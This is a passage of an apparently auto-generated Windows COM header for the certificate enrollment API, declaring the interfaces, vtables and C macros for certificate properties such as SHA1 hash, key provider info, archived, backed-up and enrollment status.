            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strCertificate);
        
        HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in ICertPropertySHA1Hash * This,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strRenewalValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_SHA1Hash )( 
            __RPC__in ICertPropertySHA1Hash * This,
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        END_INTERFACE
    } ICertPropertySHA1HashVtbl;

    interface ICertPropertySHA1Hash
    {
        CONST_VTBL struct ICertPropertySHA1HashVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define ICertPropertySHA1Hash_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define ICertPropertySHA1Hash_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define ICertPropertySHA1Hash_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define ICertPropertySHA1Hash_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define ICertPropertySHA1Hash_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define ICertPropertySHA1Hash_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define ICertPropertySHA1Hash_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define ICertPropertySHA1Hash_InitializeFromCertificate(This,MachineContext,Encoding,strCertificate)	\
    ( (This)->lpVtbl -> InitializeFromCertificate(This,MachineContext,Encoding,strCertificate) ) 

#define ICertPropertySHA1Hash_InitializeDecode(This,Encoding,strEncodedData)	\
    ( (This)->lpVtbl -> InitializeDecode(This,Encoding,strEncodedData) ) 

#define ICertPropertySHA1Hash_get_PropertyId(This,pValue)	\
    ( (This)->lpVtbl -> get_PropertyId(This,pValue) ) 

#define ICertPropertySHA1Hash_put_PropertyId(This,Value)	\
    ( (This)->lpVtbl -> put_PropertyId(This,Value) ) 

#define ICertPropertySHA1Hash_get_RawData(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RawData(This,Encoding,pValue) ) 

#define ICertPropertySHA1Hash_RemoveFromCertificate(This,MachineContext,Encoding,strCertificate)	\
    ( (This)->lpVtbl -> RemoveFromCertificate(This,MachineContext,Encoding,strCertificate) ) 

#define ICertPropertySHA1Hash_SetValueOnCertificate(This,MachineContext,Encoding,strCertificate)	\
    ( (This)->lpVtbl -> SetValueOnCertificate(This,MachineContext,Encoding,strCertificate) ) 


#define ICertPropertySHA1Hash_Initialize(This,Encoding,strRenewalValue)	\
    ( (This)->lpVtbl -> Initialize(This,Encoding,strRenewalValue) ) 

#define ICertPropertySHA1Hash_get_SHA1Hash(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_SHA1Hash(This,Encoding,pValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __ICertPropertySHA1Hash_INTERFACE_DEFINED__ */


#ifndef __ICertPropertyKeyProvInfo_INTERFACE_DEFINED__
#define __ICertPropertyKeyProvInfo_INTERFACE_DEFINED__

/* interface ICertPropertyKeyProvInfo */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_ICertPropertyKeyProvInfo;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab336-217d-11da-b2a4-000e7bbb2b09")
    ICertPropertyKeyProvInfo : public ICertProperty
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE Initialize( 
            /* [in] */ __RPC__in_opt IX509PrivateKey *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_PrivateKey( 
            /* [retval][out] */ __RPC__deref_out_opt IX509PrivateKey **ppValue) = 0;
        
    };
    
#else 	/* C style interface */

    typedef struct ICertPropertyKeyProvInfoVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in ICertPropertyKeyProvInfo * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            __RPC__deref_out  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in ICertPropertyKeyProvInfo * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in ICertPropertyKeyProvInfo * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in ICertPropertyKeyProvInfo * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in ICertPropertyKeyProvInfo * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in ICertPropertyKeyProvInfo * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            ICertPropertyKeyProvInfo * This,
            /* [in] */ DISPID dispIdMember,
            /* [in] */ REFIID riid,
            /* [in] */ LCID lcid,
            /* [in] */ WORD wFlags,
            /* [out][in] */ DISPPARAMS *pDispParams,
            /* [out] */ VARIANT *pVarResult,
            /* [out] */ EXCEPINFO *pExcepInfo,
            /* [out] */ UINT *puArgErr);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromCertificate )( 
            __RPC__in ICertPropertyKeyProvInfo * This,
            /* [in] */ VARIANT_BOOL MachineContext,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strCertificate);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeDecode )( 
            __RPC__in ICertPropertyKeyProvInfo * This,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_PropertyId )( 
            __RPC__in ICertPropertyKeyProvInfo * This,
            /* [retval][out] */ __RPC__out CERTENROLL_PROPERTYID *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_PropertyId )( 
            __RPC__in ICertPropertyKeyProvInfo * This,
            /* [in] */ CERTENROLL_PROPERTYID Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RawData )( 
            __RPC__in ICertPropertyKeyProvInfo * This,
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *RemoveFromCertificate )( 
            __RPC__in ICertPropertyKeyProvInfo * This,
            /* [in] */ VARIANT_BOOL MachineContext,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strCertificate);
        
        HRESULT ( STDMETHODCALLTYPE *SetValueOnCertificate )( 
            __RPC__in ICertPropertyKeyProvInfo * This,
            /* [in] */ VARIANT_BOOL MachineContext,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strCertificate);
        
        HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in ICertPropertyKeyProvInfo * This,
            /* [in] */ __RPC__in_opt IX509PrivateKey *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_PrivateKey )( 
            __RPC__in ICertPropertyKeyProvInfo * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509PrivateKey **ppValue);
        
        END_INTERFACE
    } ICertPropertyKeyProvInfoVtbl;

    interface ICertPropertyKeyProvInfo
    {
        CONST_VTBL struct ICertPropertyKeyProvInfoVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define ICertPropertyKeyProvInfo_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define ICertPropertyKeyProvInfo_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define ICertPropertyKeyProvInfo_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define ICertPropertyKeyProvInfo_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define ICertPropertyKeyProvInfo_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define ICertPropertyKeyProvInfo_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define ICertPropertyKeyProvInfo_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define ICertPropertyKeyProvInfo_InitializeFromCertificate(This,MachineContext,Encoding,strCertificate)	\
    ( (This)->lpVtbl -> InitializeFromCertificate(This,MachineContext,Encoding,strCertificate) ) 

#define ICertPropertyKeyProvInfo_InitializeDecode(This,Encoding,strEncodedData)	\
    ( (This)->lpVtbl -> InitializeDecode(This,Encoding,strEncodedData) ) 

#define ICertPropertyKeyProvInfo_get_PropertyId(This,pValue)	\
    ( (This)->lpVtbl -> get_PropertyId(This,pValue) ) 

#define ICertPropertyKeyProvInfo_put_PropertyId(This,Value)	\
    ( (This)->lpVtbl -> put_PropertyId(This,Value) ) 

#define ICertPropertyKeyProvInfo_get_RawData(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RawData(This,Encoding,pValue) ) 

#define ICertPropertyKeyProvInfo_RemoveFromCertificate(This,MachineContext,Encoding,strCertificate)	\
    ( (This)->lpVtbl -> RemoveFromCertificate(This,MachineContext,Encoding,strCertificate) ) 

#define ICertPropertyKeyProvInfo_SetValueOnCertificate(This,MachineContext,Encoding,strCertificate)	\
    ( (This)->lpVtbl -> SetValueOnCertificate(This,MachineContext,Encoding,strCertificate) ) 


#define ICertPropertyKeyProvInfo_Initialize(This,pValue)	\
    ( (This)->lpVtbl -> Initialize(This,pValue) ) 

#define ICertPropertyKeyProvInfo_get_PrivateKey(This,ppValue)	\
    ( (This)->lpVtbl -> get_PrivateKey(This,ppValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __ICertPropertyKeyProvInfo_INTERFACE_DEFINED__ */


#ifndef __ICertPropertyArchived_INTERFACE_DEFINED__
#define __ICertPropertyArchived_INTERFACE_DEFINED__

/* interface ICertPropertyArchived */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_ICertPropertyArchived;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab337-217d-11da-b2a4-000e7bbb2b09")
    ICertPropertyArchived : public ICertProperty
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE Initialize( 
            /* [in] */ VARIANT_BOOL ArchivedValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Archived( 
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue) = 0;
        
    };
    
#else 	/* C style interface */

    typedef struct ICertPropertyArchivedVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in ICertPropertyArchived * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            __RPC__deref_out  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in ICertPropertyArchived * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in ICertPropertyArchived * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in ICertPropertyArchived * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in ICertPropertyArchived * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in ICertPropertyArchived * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            ICertPropertyArchived * This,
            /* [in] */ DISPID dispIdMember,
            /* [in] */ REFIID riid,
            /* [in] */ LCID lcid,
            /* [in] */ WORD wFlags,
            /* [out][in] */ DISPPARAMS *pDispParams,
            /* [out] */ VARIANT *pVarResult,
            /* [out] */ EXCEPINFO *pExcepInfo,
            /* [out] */ UINT *puArgErr);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromCertificate )( 
            __RPC__in ICertPropertyArchived * This,
            /* [in] */ VARIANT_BOOL MachineContext,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strCertificate);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeDecode )( 
            __RPC__in ICertPropertyArchived * This,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_PropertyId )( 
            __RPC__in ICertPropertyArchived * This,
            /* [retval][out] */ __RPC__out CERTENROLL_PROPERTYID *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_PropertyId )( 
            __RPC__in ICertPropertyArchived * This,
            /* [in] */ CERTENROLL_PROPERTYID Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RawData )( 
            __RPC__in ICertPropertyArchived * This,
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *RemoveFromCertificate )( 
            __RPC__in ICertPropertyArchived * This,
            /* [in] */ VARIANT_BOOL MachineContext,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strCertificate);
        
        HRESULT ( STDMETHODCALLTYPE *SetValueOnCertificate )( 
            __RPC__in ICertPropertyArchived * This,
            /* [in] */ VARIANT_BOOL MachineContext,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strCertificate);
        
        HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in ICertPropertyArchived * This,
            /* [in] */ VARIANT_BOOL ArchivedValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Archived )( 
            __RPC__in ICertPropertyArchived * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        END_INTERFACE
    } ICertPropertyArchivedVtbl;

    interface ICertPropertyArchived
    {
        CONST_VTBL struct ICertPropertyArchivedVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define ICertPropertyArchived_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define ICertPropertyArchived_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define ICertPropertyArchived_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define ICertPropertyArchived_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define ICertPropertyArchived_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define ICertPropertyArchived_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define ICertPropertyArchived_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define ICertPropertyArchived_InitializeFromCertificate(This,MachineContext,Encoding,strCertificate)	\
    ( (This)->lpVtbl -> InitializeFromCertificate(This,MachineContext,Encoding,strCertificate) ) 

#define ICertPropertyArchived_InitializeDecode(This,Encoding,strEncodedData)	\
    ( (This)->lpVtbl -> InitializeDecode(This,Encoding,strEncodedData) ) 

#define ICertPropertyArchived_get_PropertyId(This,pValue)	\
    ( (This)->lpVtbl -> get_PropertyId(This,pValue) ) 

#define ICertPropertyArchived_put_PropertyId(This,Value)	\
    ( (This)->lpVtbl -> put_PropertyId(This,Value) ) 

#define ICertPropertyArchived_get_RawData(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RawData(This,Encoding,pValue) ) 

#define ICertPropertyArchived_RemoveFromCertificate(This,MachineContext,Encoding,strCertificate)	\
    ( (This)->lpVtbl -> RemoveFromCertificate(This,MachineContext,Encoding,strCertificate) ) 

#define ICertPropertyArchived_SetValueOnCertificate(This,MachineContext,Encoding,strCertificate)	\
    ( (This)->lpVtbl -> SetValueOnCertificate(This,MachineContext,Encoding,strCertificate) ) 


#define ICertPropertyArchived_Initialize(This,ArchivedValue)	\
    ( (This)->lpVtbl -> Initialize(This,ArchivedValue) ) 

#define ICertPropertyArchived_get_Archived(This,pValue)	\
    ( (This)->lpVtbl -> get_Archived(This,pValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __ICertPropertyArchived_INTERFACE_DEFINED__ */


#ifndef __ICertPropertyBackedUp_INTERFACE_DEFINED__
#define __ICertPropertyBackedUp_INTERFACE_DEFINED__

/* interface ICertPropertyBackedUp */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_ICertPropertyBackedUp;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab338-217d-11da-b2a4-000e7bbb2b09")
    ICertPropertyBackedUp : public ICertProperty
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE InitializeFromCurrentTime( 
            /* [in] */ VARIANT_BOOL BackedUpValue) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE Initialize( 
            /* [in] */ VARIANT_BOOL BackedUpValue,
            /* [in] */ DATE Date) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_BackedUpValue( 
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_BackedUpTime( 
            /* [retval][out] */ __RPC__out DATE *pDate) = 0;
        
    };
    
#else 	/* C style interface */

    typedef struct ICertPropertyBackedUpVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in ICertPropertyBackedUp * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            __RPC__deref_out  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in ICertPropertyBackedUp * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in ICertPropertyBackedUp * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in ICertPropertyBackedUp * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in ICertPropertyBackedUp * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in ICertPropertyBackedUp * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            ICertPropertyBackedUp * This,
            /* [in] */ DISPID dispIdMember,
            /* [in] */ REFIID riid,
            /* [in] */ LCID lcid,
            /* [in] */ WORD wFlags,
            /* [out][in] */ DISPPARAMS *pDispParams,
            /* [out] */ VARIANT *pVarResult,
            /* [out] */ EXCEPINFO *pExcepInfo,
            /* [out] */ UINT *puArgErr);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromCertificate )( 
            __RPC__in ICertPropertyBackedUp * This,
            /* [in] */ VARIANT_BOOL MachineContext,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strCertificate);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeDecode )( 
            __RPC__in ICertPropertyBackedUp * This,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_PropertyId )( 
            __RPC__in ICertPropertyBackedUp * This,
            /* [retval][out] */ __RPC__out CERTENROLL_PROPERTYID *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_PropertyId )( 
            __RPC__in ICertPropertyBackedUp * This,
            /* [in] */ CERTENROLL_PROPERTYID Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RawData )( 
            __RPC__in ICertPropertyBackedUp * This,
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *RemoveFromCertificate )( 
            __RPC__in ICertPropertyBackedUp * This,
            /* [in] */ VARIANT_BOOL MachineContext,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strCertificate);
        
        HRESULT ( STDMETHODCALLTYPE *SetValueOnCertificate )( 
            __RPC__in ICertPropertyBackedUp * This,
            /* [in] */ VARIANT_BOOL MachineContext,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strCertificate);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromCurrentTime )( 
            __RPC__in ICertPropertyBackedUp * This,
            /* [in] */ VARIANT_BOOL BackedUpValue);
        
        HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in ICertPropertyBackedUp * This,
            /* [in] */ VARIANT_BOOL BackedUpValue,
            /* [in] */ DATE Date);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_BackedUpValue )( 
            __RPC__in ICertPropertyBackedUp * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_BackedUpTime )( 
            __RPC__in ICertPropertyBackedUp * This,
            /* [retval][out] */ __RPC__out DATE *pDate);
        
        END_INTERFACE
    } ICertPropertyBackedUpVtbl;

    interface ICertPropertyBackedUp
    {
        CONST_VTBL struct ICertPropertyBackedUpVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define ICertPropertyBackedUp_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define ICertPropertyBackedUp_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define ICertPropertyBackedUp_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define ICertPropertyBackedUp_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define ICertPropertyBackedUp_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define ICertPropertyBackedUp_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define ICertPropertyBackedUp_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define ICertPropertyBackedUp_InitializeFromCertificate(This,MachineContext,Encoding,strCertificate)	\
    ( (This)->lpVtbl -> InitializeFromCertificate(This,MachineContext,Encoding,strCertificate) ) 

#define ICertPropertyBackedUp_InitializeDecode(This,Encoding,strEncodedData)	\
    ( (This)->lpVtbl -> InitializeDecode(This,Encoding,strEncodedData) ) 

#define ICertPropertyBackedUp_get_PropertyId(This,pValue)	\
    ( (This)->lpVtbl -> get_PropertyId(This,pValue) ) 

#define ICertPropertyBackedUp_put_PropertyId(This,Value)	\
    ( (This)->lpVtbl -> put_PropertyId(This,Value) ) 

#define ICertPropertyBackedUp_get_RawData(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RawData(This,Encoding,pValue) ) 

#define ICertPropertyBackedUp_RemoveFromCertificate(This,MachineContext,Encoding,strCertificate)	\
    ( (This)->lpVtbl -> RemoveFromCertificate(This,MachineContext,Encoding,strCertificate) ) 

#define ICertPropertyBackedUp_SetValueOnCertificate(This,MachineContext,Encoding,strCertificate)	\
    ( (This)->lpVtbl -> SetValueOnCertificate(This,MachineContext,Encoding,strCertificate) ) 


#define ICertPropertyBackedUp_InitializeFromCurrentTime(This,BackedUpValue)	\
    ( (This)->lpVtbl -> InitializeFromCurrentTime(This,BackedUpValue) ) 

#define ICertPropertyBackedUp_Initialize(This,BackedUpValue,Date)	\
    ( (This)->lpVtbl -> Initialize(This,BackedUpValue,Date) ) 

#define ICertPropertyBackedUp_get_BackedUpValue(This,pValue)	\
    ( (This)->lpVtbl -> get_BackedUpValue(This,pValue) ) 

#define ICertPropertyBackedUp_get_BackedUpTime(This,pDate)	\
    ( (This)->lpVtbl -> get_BackedUpTime(This,pDate) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __ICertPropertyBackedUp_INTERFACE_DEFINED__ */


#ifndef __ICertPropertyEnrollment_INTERFACE_DEFINED__
#define __ICertPropertyEnrollment_INTERFACE_DEFINED__

/* interface ICertPropertyEnrollment */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_ICertPropertyEnrollment;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab339-217d-11da-b2a4-000e7bbb2b09")
    ICertPropertyEnrollment : public ICertProperty
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE Initialize( 
            /* [in] */ LONG RequestId,
            /* [in] */ __RPC__in BSTR strCADnsName,
            /* [in] */ __RPC__in BSTR strCAName,
            /* [defaultvalue][in] */ __RPC__in BSTR strFriendlyName = 0) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_RequestId( 
            /* [retval][out] */ __RPC__out LONG *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_CADnsName( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_CAName( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_FriendlyName( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
    };
    
#else 	/* C style interface */

    typedef struct ICertPropertyEnrollmentVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in ICertPropertyEnrollment * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            __RPC__deref_out  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in ICertPropertyEnrollment * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in ICertPropertyEnrollment * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in ICertPropertyEnrollment * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in ICertPropertyEnrollment * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in ICertPropertyEnrollment * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
